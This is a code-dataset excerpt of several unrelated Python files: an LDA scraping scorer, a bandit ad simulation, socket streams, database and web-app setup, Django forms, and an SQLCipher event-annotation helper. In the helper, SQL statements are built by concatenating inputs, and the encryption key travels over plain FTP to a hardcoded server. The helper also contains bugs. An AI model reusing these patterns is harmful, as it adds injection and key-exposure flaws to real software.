html.decode(\"utf8\")\r\n encoded_str = unicode_str.encode(\"ascii\", 'ignore')\r\n news_soup = BeautifulSoup(encoded_str, \"html.parser\")\r\n a_text = news_soup.find_all('p')\r\n # 2 Removing\r\n y = [re.sub(r'<.+?>', r'', str(a)) for a in a_text]\r\n html = y\r\n except:\r\n pass\r\n doc=''\r\n for stmt in html:\r\n doc=doc+\" \"+stmt\r\n \r\n p_t_d = LDA.main(doc, keytokens)\r\n#ptd is topic in document\r\n res=0.0\r\n for stmt in html:\r\n #print(type(stmt))\r\n #pwd is word in topic\r\n p_w_d = LDA.main(stmt, keytokens)\r\n res=res+(p_w_d*p_t_d)\r\n\r\n print(res)\r\n\r\n\r\n\r\n except Exception as e:\r\n print(\"try1\")\r\n print(e.args[0])\r\n tb = sys.exc_info()[2]\r\n print(tb.tb_lineno)\r\n return res\r\n\r\n def main(stmnt, keytokens):\r\n raw = stmnt.lower()\r\n tokens = tokenizer.tokenize(raw)\r\n # remove stop words from tokens\r\n stopped_tokens = [i for i in tokens if not i in en_stop]\r\n # stem tokens\r\n stemmed_tokens = [p_stemmer.stem(i) for i in stopped_tokens]\r\n # add tokens to list\r\n tokens = stemmed_tokens\r\n counts = Counter(tokens)\r\n #print(counts)\r\n tot = 0\r\n for x in counts.values():\r\n tot = tot + x\r\n t = 1\r\n for w in keytokens:\r\n if w in counts.keys():\r\n t = t * counts.get(w)\r\n #print(w,'----',counts.get(w))\r\n else:\r\n t=0\r\n r=0\r\n try:\r\n r=t / tot\r\n except:\r\n pass\r\n return r\r\n\r\n\r\nif __name__ == \"__main__\":\r\n r = LDA.process(\"https://www.ndtv.com/topic/bjp-modi\", 'modi bjp')\r\n print(r)\r\n","sub_path":"LDA.py","file_name":"LDA.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"46497082","text":"import sys\nimport numpy as np\nimport bandit\n\nnp.random.seed(1337)\n\nfrom sklearn.feature_extraction.text import HashingVectorizer\n\n# Use the hashing trick to make feature vectors of uniform length (n_features) regardless\n# of the number of features passed in the context (remaining features are set to zero)\nvectorizer = HashingVectorizer(n_features=1024)\ncontextual_bandit = bandit.epsilonGreedyContextualBandit(mode='classification', epsilon=0.1, penalty='l2')\n\n# Example with three advertisments we would like to show\narms = ['advertisement_1', \n 'advertisement_2', \n 'advertisement_3', \n 'advertisement_4', \n 'advertisement_5', \n 'advertisement_6', \n 'advertisement_7', \n 'advertisement_8']\n\n# The job of the bandit is to learn the true click-through rates\n# of each arm, but for simulation purposes, we'll cheat and pretend\n# we already know.\nctrs = [0.076, 0.0521, 0.0122, 0.05215, 0.074, 0.0521, 0.07582, 0.0154]\n\n# Simulate a single context, a male website visitor aged 21 that uses Firefox\ncontext = vectorizer.fit_transform(['age_21 gender_male browser_firefox'])\n\ncounts = np.zeros(len(arms)) # Keep count of how many times each arm was chosen\nrewards = np.zeros(len(arms)) # Keep count of the rewards for each arm\n\nepochs = 10000\nsys.stdout.write('Running simulation for ' + str(epochs) + ' epochs')\nfor i in range(epochs):\n sys.stdout.write('.')\n sys.stdout.flush()\n chosen_arm = contextual_bandit.select_arm(context, arms)\n # Send reward based on our pretend CTR for the chosen arm:\n # - 1: clicked\n # - 0: not clicked\n if np.random.random() <= ctrs[arms.index(chosen_arm)]:\n contextual_bandit.reward(chosen_arm, context, 1)\n rewards[arms.index(chosen_arm)] += 1\n else:\n contextual_bandit.reward(chosen_arm, context, 0)\n rewards[arms.index(chosen_arm)] += 0\n counts[arms.index(chosen_arm)] += 1\n\nprint('done.\\nResults:')\nfor i, v in enumerate(counts):\n print('Arm ' + arms[i] + ' was chosen ' + str(counts[i]) + ' times, with a cumulative reward of ' + str(rewards[i]) + '.')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"235058681","text":"import io, javaobj\nimport subprocess\nfrom time import sleep\nimport zlib\n\nclass InputStream(io.BytesIO):\n def __init__(self, socket):\n super().__init__()\n\n self.debug = open(\"in_dbg\", \"ab\")\n self.socket = socket\n\n self.encode = subprocess.Popen(['gzip', '-c'], shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n\n self.flush()\n\n def flush(self):\n self.buff = b''\n self.cursor = 0\n self.shift = 0\n\n def seek(self, shift, _type=0):\n if _type == 0:\n self.shift = -self.cursor + shift\n elif _type == 1:\n self.shift = self.shift - shift\n else:\n self.shift = shift\n\n def tell(self):\n return self.cursor - self.shift\n\n def read(self, size=-1):\n if size != -1 and size > self.shift:\n data_to_read = size - self.shift\n\n if len(self.buff) + data_to_read > 8192:\n self.buff = self.buff[len(self.buff) + data_to_read - 4096:]\n\n data_read = b\"\"\n while data_to_read != 0:\n # gzip decompress\n data = self.socket.recv(data_to_read)\n data_read += data\n data_to_read -= len(bytes(data))\n\n size = len(bytes(data_read))\n\n self.debug.write(data_read)\n self.debug.flush()\n\n self.buff += data_read\n\n data = self.buff[-size + self.shift:]\n if self.shift:\n data = data[:size]\n\n else:\n if self.shift > 0:\n data = self.buff[-self.shift:]\n else:\n data = b''\n\n self.cursor += len(data)\n\n return data\n\n def close(self):\n self.encode.stdin.close()\n\n\nclass OutputStream(io.BytesIO):\n def __init__(self, socket):\n super().__init__()\n\n self.debug = open(\"out_dbg\", \"ab\")\n self.socket = socket\n\n self.write(b'\\xac\\xed\\x00\\x05')\n\n def write(self, data):\n self.debug.write(bytearray(data))\n self.debug.flush()\n self.socket.send(data)","sub_path":"RaspberryCode/package/socket.py","file_name":"socket.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"593344220","text":"from contextlib import ContextDecorator\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\nfrom .core.config import settings\n\n_engine = None\n_Session = None\n\n\ndef get_engine():\n global _engine\n if _engine is None:\n _engine = create_engine(\n settings.SQLALCHEMY_DATABASE_URI,\n pool_pre_ping=True,\n echo=settings.SQLALCHEMY_ECHO,\n )\n\n return _engine\n\n\ndef get_session():\n global _Session\n if _Session is None:\n _Session = scoped_session(sessionmaker(bind=get_engine()))\n\n return _Session()\n\n\nclass transaction(ContextDecorator):\n def __init__(self):\n self._session = None\n\n def __enter__(self):\n self._session = get_session()\n return self._session\n\n def __exit__(self, exc_type, exc_value, traceback):\n try:\n if not (exc_type and exc_value and traceback):\n self._session.commit()\n finally:\n self._session.close()\n","sub_path":"src/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"519074737","text":"import logging\nfrom uuid import uuid4 as uuid\n\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom logistik import environ\nfrom logistik.config import ConfigKeys\n\nenviron.initialize_env(environ.env, is_parent_process=True)\n\nlogger = logging.getLogger(__name__)\nlogging.getLogger(\"kafka.conn\").setLevel(logging.INFO)\nlogging.getLogger(\"kafka.client\").setLevel(logging.INFO)\nlogging.getLogger(\"kafka.metrics\").setLevel(logging.INFO)\n\n\ndef create_app():\n _app = Flask(\n import_name=__name__,\n template_folder=\"admin/templates/\",\n static_folder=\"admin/static/\",\n )\n\n db_host = environ.env.config.get(ConfigKeys.HOST, domain=ConfigKeys.DATABASE)\n db_port = int(environ.env.config.get(ConfigKeys.PORT, domain=ConfigKeys.DATABASE))\n db_drvr = environ.env.config.get(ConfigKeys.DRIVER, domain=ConfigKeys.DATABASE)\n db_user = environ.env.config.get(ConfigKeys.USER, domain=ConfigKeys.DATABASE)\n db_pass = environ.env.config.get(ConfigKeys.PASS, domain=ConfigKeys.DATABASE)\n db_name = environ.env.config.get(ConfigKeys.NAME, domain=ConfigKeys.DATABASE)\n db_pool = int(\n environ.env.config.get(ConfigKeys.POOL_SIZE, domain=ConfigKeys.DATABASE)\n )\n secret = environ.env.config.get(ConfigKeys.SECRET_KEY, default=str(uuid()))\n root_url = environ.env.config.get(\n ConfigKeys.ROOT_URL, domain=ConfigKeys.WEB, default=\"/\"\n )\n\n _app.config[\"SECRET_KEY\"] = secret\n _app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n _app.config[\"SQLALCHEMY_POOL_SIZE\"] = db_pool\n _app.config[\"ROOT_URL\"] = root_url\n _app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"{}://{}:{}@{}:{}/{}\".format(\n db_drvr, db_user, db_pass, db_host, db_port, db_name\n )\n\n return _app, SQLAlchemy(_app)\n\n\napp, socketio = create_app()\n# environ.init_web_auth(environ.env)\n\n# keep this, otherwise flask won't find any routes\nimport logistik.admin.routes\n","sub_path":"logistik/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"398088994","text":"# coding=utf-8\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom django import forms\nfrom apps.propiedades.models import Sector,Fuente,Unidad_ejecutora,Fuente,Sit\n\n\n\nclass SectorForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Sector\n\t\tfields = [\t\n\n\t\t\t'codigo_sector',\n\t\t\t'nombre_sector',\t\t\n\t\t]\n\n\t\tlabels = {\n\n\t\t\t'codigo_sector': 'Código del sector',\t\n\t\t\t'nombre_sector': 'Nombre del sector',\t\n\t\t}\n\n\t\twidgets = {\n\t\t\t\n\t\t\t'codigo_sector':forms.TextInput(attrs={'class':'form-control'}),\n\t\t\t'nombre_sector':forms.TextInput(attrs={'class':'form-control'}),\n\t\t\t\t\t\n\t\t}\n\n\nclass FuenteForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Fuente\n\n\t\tfields = [\t\n\t\t\t\t\t\t\t\n\t\t\t'nombre_fuente',\t\t\n\t\t]\n\n\t\tlabels = {\n\n\t\t\t'nombre_fuente': 'Nombre del fuente',\t\n\t\t}\n\n\t\twidgets = {\t\t\t\n\t\t\t\n\t\t\t'nombre_fuente':forms.TextInput(attrs={'class':'form-control'}),\n\t\t\t\t\t\n\t\t}\n\nclass SitForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Sit\n\n\t\tfields = [\t\t\t\t\t\n\t\t\n\t\t\t'nombre_sit',\t\t\n\t\t]\n\n\t\tlabels = {\n\n\t\t\t\n\t\t\t'nombre_sit': 'Nombre del sector',\t\n\t\t}\n\n\t\twidgets = {\n\t\t\t\n\t\t\t'nombre_sit':forms.TextInput(attrs={'class':'form-control'}),\n\t\t\t\t\t\n\t\t}\n\n\nclass Unidad_ejecutoraForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Unidad_ejecutora\n\n\t\tfields = [\t\n\t\t\t\t\n\t\t\t'nombre_unidad',\t\t\t\n\t\t]\n\n\t\tlabels = {\n\n\t\t\t'nombre_unidad': 'Nombre de la unidad',\t\n\t\t\t\n\t\t}\n\n\t\twidgets = {\n\t\t\t\n\t\t\t'nombre_unidad':forms.TextInput(attrs={'class':'form-control'}),\n\t\t\t\n\t\t\t\t\t\n\t\t}","sub_path":"apps/propiedades/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"141157568","text":"from django.contrib import admin\nfrom mezzanine.pages.admin import PageAdmin\nfrom .models import (Home, HomeBlock, StatusUpdate, Press, PressLinkBlock, PressTeamBlock, PressExpertBlock, PressPartnerBlock, PressTestimonialBlock,\n Lesson, Step, About, FeaturedChef, LessonIngredient, Ingredient, Tool, DietaryRestrictions, Cuisine, Course, Video,\n ChefPledge, LessonPledge, LessonRequest, UserSignupRequest)\n\n\n####################################\n### Mezzanine Page administation ###\n####################################\n\nclass HomeBlockAdmin(admin.TabularInline):\n model = HomeBlock\n\n\nclass HomeAdmin(PageAdmin):\n inlines = (HomeBlockAdmin,)\n\n\nclass PressLinkBlockAdmin(admin.TabularInline):\n model = PressLinkBlock\n\n\nclass PressTeamBlockAdmin(admin.TabularInline):\n model = PressTeamBlock\n \n \nclass PressExpertBlockAdmin(admin.TabularInline):\n model = PressExpertBlock\n \n \nclass PressPartnerBlockAdmin(admin.TabularInline):\n model = PressPartnerBlock\n \n \nclass PressTestimonialBlockAdmin(admin.TabularInline):\n model = PressTestimonialBlock\n\n\nclass PressAdmin(PageAdmin):\n inlines = (PressLinkBlockAdmin, PressTeamBlockAdmin, PressExpertBlockAdmin, PressPartnerBlockAdmin, PressTestimonialBlockAdmin,)\n\n####################################\n### Application adminstration ###\n####################################\n\nclass StepAdmin(admin.TabularInline):\n model = Step\n fk_name = 'lesson'\n\nclass LessonIngredientAdmin(admin.TabularInline):\n model = LessonIngredient\n\n\nclass LessonAdmin(admin.ModelAdmin):\n inlines = (StepAdmin,LessonIngredientAdmin)\n\nclass ChefPledgeAdmin(admin.TabularInline):\n model = ChefPledge\n\nclass LessonPledgeAdmin(admin.TabularInline):\n model = LessonPledge\n\nclass LessonRequestAdmin(admin.ModelAdmin):\n inlines = (LessonPledgeAdmin, ChefPledgeAdmin)\n\n\nclass FeaturedChefAdmin(admin.ModelAdmin):\n def formfield_for_foreignkey(self, db_field, request=None, **kwargs):\n\n field = super(FeaturedChefAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\n if db_field.name == 'chef':\n field.queryset = field.queryset.filter(profile__professional_chef = True)\n\n return field\n\n\n\nadmin.site.register(Home, HomeAdmin)\nadmin.site.register(Press, PressAdmin)\nadmin.site.register(StatusUpdate, PageAdmin)\nadmin.site.register(About, PageAdmin)\nadmin.site.register(FeaturedChef, FeaturedChefAdmin)\nadmin.site.register(Lesson, LessonAdmin)\nadmin.site.register(DietaryRestrictions, admin.ModelAdmin)\nadmin.site.register(Ingredient, admin.ModelAdmin)\nadmin.site.register(Tool, admin.ModelAdmin)\nadmin.site.register(Course, admin.ModelAdmin)\nadmin.site.register(Cuisine, admin.ModelAdmin)\nadmin.site.register(Video, admin.ModelAdmin)\nadmin.site.register(LessonRequest, LessonRequestAdmin)\nadmin.site.register(UserSignupRequest, admin.ModelAdmin)","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"202955137","text":"# -*- coding: utf-8 -*-\nimport sys\n#reload(sys) \n#sys.setdefaultencoding('utf-8')\nimport importlib\nimportlib.reload(sys)\nimport sqlite3\nfrom pysqlcipher3 import dbapi2 as sqlite\n#import sqlite3 as sqlite\nfrom ftplib import FTP\nimport os.path\nimport shutil\nimport random\nimport string\nimport getpass\ndef downloadfile(ftp, remotepath, localpath):\n bufsize = 1024\n fp = open(localpath, 'wb')\n ftp.retrbinary('RETR ' + remotepath, fp.write, bufsize)\n ftp.set_debuglevel(0)\n fp.close()\ndef ftpconnect(host, username, password):\n ftp = FTP()\n # ftp.set_debuglevel(2)\n ftp.connect(host, 21)\n ftp.login(username, password)\n return ftp\ndef uploadfile(ftp, remotepath, localpath):\n bufsize = 1024\n fp = open(localpath, 'rb')\n ftp.storbinary('STOR ' + remotepath, fp, bufsize)\n ftp.set_debuglevel(0)\n fp.close()\ndef chdir(dir): \n if directory_exists(dir) is False: # (or negate, whatever you prefer for readability)\n ftp.mkd(dir)\n ftp.cwd(dir)\n\n# Check if directory exists (in current location)\ndef directory_exists(dir):\n filelist = []\n ftp.retrlines('LIST',filelist.append)\n for f in filelist:\n if f.split()[-1] == dir and f.upper().startswith('D'):\n return True\n return False\n\ndef id_generator(size=6, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\nclass EventHelper:\n\t#Sqlite Data\n\tDBName = \"\"\n\tVideoName = \"\"\n\tsqlConn = None\n\thostIp = \"140.124.182.51\"\n\tdefaultStoragePath = \"/III_share/\"\n\tdef __init__(self, databaseName=None):\n\t\tif databaseName == None:\n\t\t\tprint (\"please enter DB Name!!\")\n\t\t\treturn None\n\t\telse:\n\t\t\tself.DBName = databaseName\n\t\t\tself.sqlConn = sqlite.connect(self.DBName)\n\t\t\tself.sqlCursor = self.sqlConn.cursor()\n\t\t\tif os.path.isfile(\".Key.txt\"):\n\t\t\t\tprint (\"Key get!\")\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tconfig = open('config.txt','r')\n\t\t\t\t\tconfigSet = config.read().split('\\n')\n\t\t\t\t\tftp = ftpconnect(self.hostIp, configSet[1], configSet[2])\n\n\t\t\t\t\tif(configSet[3]==self.defaultStoragePath):\n\t\t\t\t\t\tnewPath = id_generator()\n\t\t\t\t\t\tchdir(self.defaultStoragePath+newPath+\"/\",ftp)\n\t\t\t\t\t\tf = open('config.txt', 'w')\n\t\t\t\t\t\tf.write(configSet[0]+\"\\n\"+configSet[1]+\"\\n\"+configSet[2]+\"\\n\"+configSet[3]+newPath+\"/\")\n\t\t\t\t\t\tf.close()\n\t\t\t\t\tconfigSet[3] = configSet[3]+newPath+\"/\"\n\n\t\t\t\t\tdownloadfile(ftp, configSet[3]+\"Key.txt\", \"Key.txt\")####################################\n\t\t\t\t\tshutil.move(\"Key.txt\",\".Key.txt\") \n\t\t\t\t\tftp.quit()\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"Key txt isn't on the net??\");\n\t\t\t\t\tf = open('Key.txt', 'w')\n\t\t\t\t\t#key1 = raw_input('please input Key : ')\n\t\t\t\t\tkey1 = getpass.getpass('please input Key : ')\n\t\t\t\t\tf.write(key1)\n\t\t\t\t\tf.close()\n\t\t\t\t\tshutil.move(\"Key.txt\",\".Key.txt\")\n\t\t\t\t\tuploadfile(ftp,configSet[3]+\"Key.txt\",\".Key.txt\")\n\t\t\t\t\tftp.quit()\n\t\t\tshutil.move(\".Key.txt\",\"Key.txt\") \n\t\t\tf = open('Key.txt','r')\n\t\t\tself.DBKey = f.read()\n\t\t\tf.close()\n\t\t\tshutil.move(\"Key.txt\",\".Key.txt\") \t \t \n\t\t\t#os.remove(\"Key.txt\")\n\t\t\t#self.sqlConn.execute(\"PRAGMA Key='jiemin'\")\n\t\t\tself.sqlConn.execute(\"PRAGMA Key='\"+self.DBKey+\"'\")\n\t\t\tself.sqlConn.execute(\"CREATE TABLE t(id int)\")\n\t\t\tself.sqlConn.execute(\"DROP TABLE t\")\t\n\t\t\tself.sqlConn.commit()\n\n\t\t\tprint (\"Event sqlite Helper creater!!\")\n\n\tdef __del__(self):\n\t\tself.sqlConn.close()\n\t\tprint (\"Event Sqlite Helper: ByeBye!\")\n\n\tdef setVideoName(self, videoName):\n\t\tif self.sqlConn is not None:\n\t\t\tself.VideoName = \"F\"+str(videoName).split('.')[0]\n\t\t\t#print (\"Event Sqlite: Video name is \\\"\"+unicode(self.VideoName,\"utf-8\")+\"\\\"\")\n\t\t\tprint (\"Event Sqlite: Video name is \\\"\"+self.VideoName+\"\\\"\")\n\t\t\tself.sqlConn.execute(\"PRAGMA Key='\"+self.DBKey+\"'\")\n\t\t\tregionTableName = str(\"CREATE TABLE IF NOT EXISTS '\"+self.VideoName+\"_region' (id INTEGER PRIMARY KEY AUTOINCREMENT, regionName text, position1x int, position1y int, position2x int, position2y int, position3x int, position3y int, position4x int, position4y int, bounding1x, bounding1y, bounding2x, bounding2y, size1 int, size2 int, size3 int, size4 int, hide, UpdateTime DATETIME DEFAULT CURRENT_TIMESTAMP)\")\n\t\t\tself.sqlConn.execute(regionTableName)\n\t\t\tself.sqlConn.commit()\n\t\t\tautoEventTable = str(\"CREATE TABLE IF NOT EXISTS '\"+self.VideoName+\"_event_a' (id INTEGER PRIMARY KEY AUTOINCREMENT, regionId int, frame int, source int, serialId int, UpdateTime DATETIME DEFAULT CURRENT_TIMESTAMP)\")\n\t\t\tself.sqlConn.execute(autoEventTable)\n\t\t\tself.sqlConn.commit()\n\t\t\tuserEventTable = str(\"CREATE TABLE IF NOT EXISTS '\"+self.VideoName+\"_event_u' (id INTEGER PRIMARY KEY AUTOINCREMENT, s_frame int, e_frame, title text, source int, serialId int, UpdateTime DATETIME DEFAULT CURRENT_TIMESTAMP)\")\n\t\t\tself.sqlConn.execute(userEventTable)\n\t\t\tself.sqlConn.commit()\n\t\t\tuserRelEventTable = str(\"CREATE TABLE IF NOT EXISTS '\"+self.VideoName+\"_event_r' (id INTEGER PRIMARY KEY AUTOINCREMENT, eventId int, s_frame int, e_frame, title text, source int, serialId int, UpdateTime DATETIME DEFAULT CURRENT_TIMESTAMP)\")\n\t\t\tself.sqlConn.execute(userRelEventTable)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef writeRegionData(self, regionName, pos, bndbox, sizes):\n\t\tprint(pos[0][0])\n\t\tprint(pos[0][1])\n\t\tprint(pos[1][0])\n\t\tprint(pos[1][1])\n\t\tprint(pos[2][0])\n\t\tprint(pos[2][1])\n\t\tprint(pos[3][0])\n\t\tprint(pos[3][1])\n\t\tprint(\"------------------\")\n\t\tprint(bndbox[0])\n\t\tprint(bndbox[1])\n\t\tprint(bndbox[2])\n\t\tprint(bndbox[3])\n\n\t\tprint(\"------------------\")\n\t\tprint(sizes[0])\n\t\tprint(sizes[1])\n\t\tprint(sizes[2])\n\t\tprint(sizes[3])\n\t\tprint(\">>>>>>>>>>>>>>>>>>>>>>>>>\")\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"INSERT INTO '\"+self.VideoName+\"_region' (regionName, position1x, position1y, position2x, position2y, position3x, position3y, position4x, position4y, bounding1x, bounding1y, bounding2x, bounding2y, size1, size2, size3, size4, hide) VALUES ('\"+str(regionName)+\"', \"+str(pos[0][0])+\", \"+str(pos[0][1])+\", \"+str(pos[1][0])+\", \"+str(pos[1][1])+\", \"+str(pos[2][0])+\", \"+str(pos[2][1])+\", \"+str(pos[3][0])+\", \"+str(pos[3][1])+\", \"+str(bndbox[0])+\", \"+str(bndbox[1])+\", \"+str(bndbox[2])+\", \"+str(bndbox[3])+\", \"+str(sizes[0])+\", \"+str(sizes[1])+\", \"+str(sizes[2])+\", \"+str(sizes[3])+\", 0)\")\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef changeHideStatus(self, regionId, isHide):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"update '\"+self.VideoName+\"_region' set hide = '\"+str(isHide)+\"' where id is '\"+str(regionId)+\"'\")\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef updateRegionData(self, regionId, regionName, pos, bndbox, sizes):\n\t\tif self.sqlConn is not None:\n\t\t\tprint(pos[0][0])\n\t\t\tprint(bndbox[0])\n\t\t\tprint(sizes[0])\n\t\t\tprint(\"----------------------------\")\n\n\t\t\t\n\t\t\tsqlExecuteString = str(\"update '\"+self.VideoName+\"_region' set regionName = '\"+str(regionName)+\"', position1x = \"+str(pos[0][0])+\", position1y = \"+str(pos[0][1])+\", position2x = \"+str(pos[1][0])+\", position2y = \"+str(pos[1][1])+\", position3x = \"+str(pos[2][0])+\", position3y = \"+str(pos[2][1])+\", position4x = \"+str(pos[3][0])+\", position4y = \"+str(pos[3][1])+\", bounding1x = \"+str(bndbox[0])+\", bounding1y = \"+str(bndbox[1])+\", bounding2x = \"+str(bndbox[2])+\", bounding2y = \"+str(bndbox[3])+\", size1 = \"+str(sizes[0])+\", size2 = \"+str(sizes[1])+\", size3 = \"+str(sizes[2])+\", size4 = \"+str(sizes[3])+\" where id is '\"+str(regionId)+\"'\")\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\t\n\tdef updateEvent(self, eventType, id, title, s_frame, e_frame):\n\t\ttables = {'relation': '_event_r', 'user_event': '_event_u'}\n\t\twheres = {'relation': 'eventId', 'user_event': 'id'}\n\t\tif self.sqlConn is not None and eventType in tables:\n\t\t\tsqlExecuteString = str(\"update '\"+self.VideoName+tables[eventType]+\"' set s_frame = \"+str(s_frame)+\", e_frame = \"+str(e_frame)+\" where \"+ wheres[eventType] +\" is \"+str(id))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef deleteRegion(self, regionId):\n\t\tif self.sqlConn is not None:\n\t\t\tsqlExecuteString = str(\"DELETE FROM '\"+self.VideoName+\"_region' where id = \"+ str(regionId))\n\t\t\tself.sqlConn.execute(sqlExecuteString)\n\t\t\tself.sqlConn.commit()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef getRegion(self, regionIds=[]):\n\t\tself.regions = []\n\t\tregionsStr = ''\n\t\tif len(regionsStr) == 1:\n\t\t\tregionsStr = ' where A.id = ' + str(regionIds[0])\n\t\telif len(regionsStr) > 1:\n\t\t\tregionsStr = ' where A.id in (' + str(regionIds[0])\n\t\t\tfor index, id in enumerate(regionIds):\n\t\t\t\tif index > 0:\n\t\t\t\t\tregionsStr += ',' + str(id)\n\t\t\tregionsStr += ')'\n\t\tsqlExecuteString = str(\t\"SELECT A.id, regionName, position1x, position1y, position2x, position2y, position3x, position3y, position4x, position4y, bounding1x, bounding1y, bounding2x, bounding2y, size1, size2, size3, size4, hide from '\"+self.VideoName+\"_region' A \" + regionsStr)\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\tid = str(row[0])\n\t\t\tregion = str(row[1])\n\t\t\tpoints = [(int(row[i]), int(row[i+1])) for i in [2, 4, 6, 8]]\n\t\t\tbndbox = [(int(row[i]), int(row[i+1])) for i in [10, 12]]\n\t\t\tsizes = [int(row[i]) for i in [14, 15, 16, 17]]\n\t\t\thide = int(row[18])\n\t\t\tself.regions.append((id, region, points, bndbox, sizes, hide, None, None))\n\t\tif len(self.regions) is 0:\n\t\t\treturn None\n\t\treturn self.regions\n\n\tdef getEventByShape(self, shapeId):\n\t\tself.events = []\n\t\tactionStr = \" (select ' 位於 ') \"\n\t\tregionNameStr = \"(select regionName from '\"+self.VideoName+\"_region' where id = A.regionId)\"\n\t\tsequenceStr = \"(select '(' || sequence || ')' from '\"+self.VideoName+\"_seq' where source = A.source and serialId = A.serialId)\"\n\t\tlabelNameStr = \"(select labelName from '\"+self.VideoName+\"' where id = A.serialId)\"\n\t\ttitleStr = labelNameStr + \"||\" + sequenceStr + \"||\" + actionStr + \"||\" + regionNameStr + \" as title\"\n\t\tsqlExecuteString = str(\t\"SELECT id, regionId, frame as s_frame, frame as e_frame, \"+labelNameStr+\", source, serialId from '\"+self.VideoName+\"_event_a' A where source = 0 and serialId = \"+ str(shapeId)+ \\\n\t\t\t\t\t\t\t\t\" union \" \\\n\t\t\t\t\t\t\t\t\"SELECT id, 'None', s_frame, e_frame, title, source, serialId from '\"+self.VideoName+\"_event_u' A where source = 0 and serialId = \"+ str(shapeId))\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\tid = str(row[0])\n\t\t\tregionId = str(row[1]) if row[1] is not 'None' else None\n\t\t\ts_frame = int(row[2])\n\t\t\te_frame = int(row[3])\n\t\t\ttitle = str(row[4])\n\t\t\tsource = int(row[5])\n\t\t\tserialId = int(row[6])\n\t\t\tself.events.append((id, regionId, s_frame, e_frame, title, source, serialId))\n\t\tif len(self.events) is 0:\n\t\t\treturn None\n\t\treturn self.events\n\n\tdef getEventByTracker(self, shapeId):\n\t\tself.events = []\n\t\tactionStr = \" (select ' 位於 ') \"\n\t\tregionNameStr = \"(select regionName from '\"+self.VideoName+\"_region' where id = A.regionId)\"\n\t\tsequenceStr = \"(select '(' || sequence || ')' from '\"+self.VideoName+\"_seq' where source = A.source and serialId = A.serialId)\"\n\t\tlabelNameStr = \"(select labelName from '\"+self.VideoName+\"_tracker' where tracker = A.serialId)\"\n\t\ttitleStr = labelNameStr + \"||\" + sequenceStr + \"||\" + actionStr + \"||\" + regionNameStr + \" as title\"\n\t\tsqlExecuteString = str(\t\"SELECT id, regionId, min(frame) as s_frame, max(frame) as e_frame, \"+titleStr+\", source, serialId from '\"+self.VideoName+\"_event_a' A where source = 1 and serialId = \"+ str(shapeId)+\" group by regionId\" \\\n\t\t\t\t\t\t\t\t\" union \" \\\n\t\t\t\t\t\t\t\t\"SELECT id, 'None', s_frame, e_frame, title, source, serialId from '\"+self.VideoName+\"_event_u' A where source = 1 and serialId = \"+ str(shapeId))\n\t\tcursor = self.sqlConn.execute(sqlExecuteString)\n\t\tfor row in cursor:\n\t\t\tid = str(row[0])\n\t\t\tregionId = str(row[1]) if row[1] is not 'None' else None\n\t\t\ts_frame = int(row[2])\n\t\t\te_frame = int(row[3])\n\t\t\ttitle = str(row[4])\n\t\t\tsource = int(row[5])\n\t\t\tserialId = int(row[6])\n\t\t\tself.events.append((id, regionId, s_frame, e_frame, title, source, serialId))\n\t\tif len(self.events) is 0:\n\t\t\treturn None\n\t\treturn self.events\n\n\tdef getEventByRegion(self, regionId):\n\t\tself.events = []\n\t\tactionStr = \" (select ' 位於 ') \"\n\t\tregionNameStr = \"(select regionName from '\"+self.VideoName+\"_region' where id = A.regionId)\"\n\t\tsequenceStr = \"(select '(' || sequence || ')' from '\"+self.VideoName+\"_seq' where source = 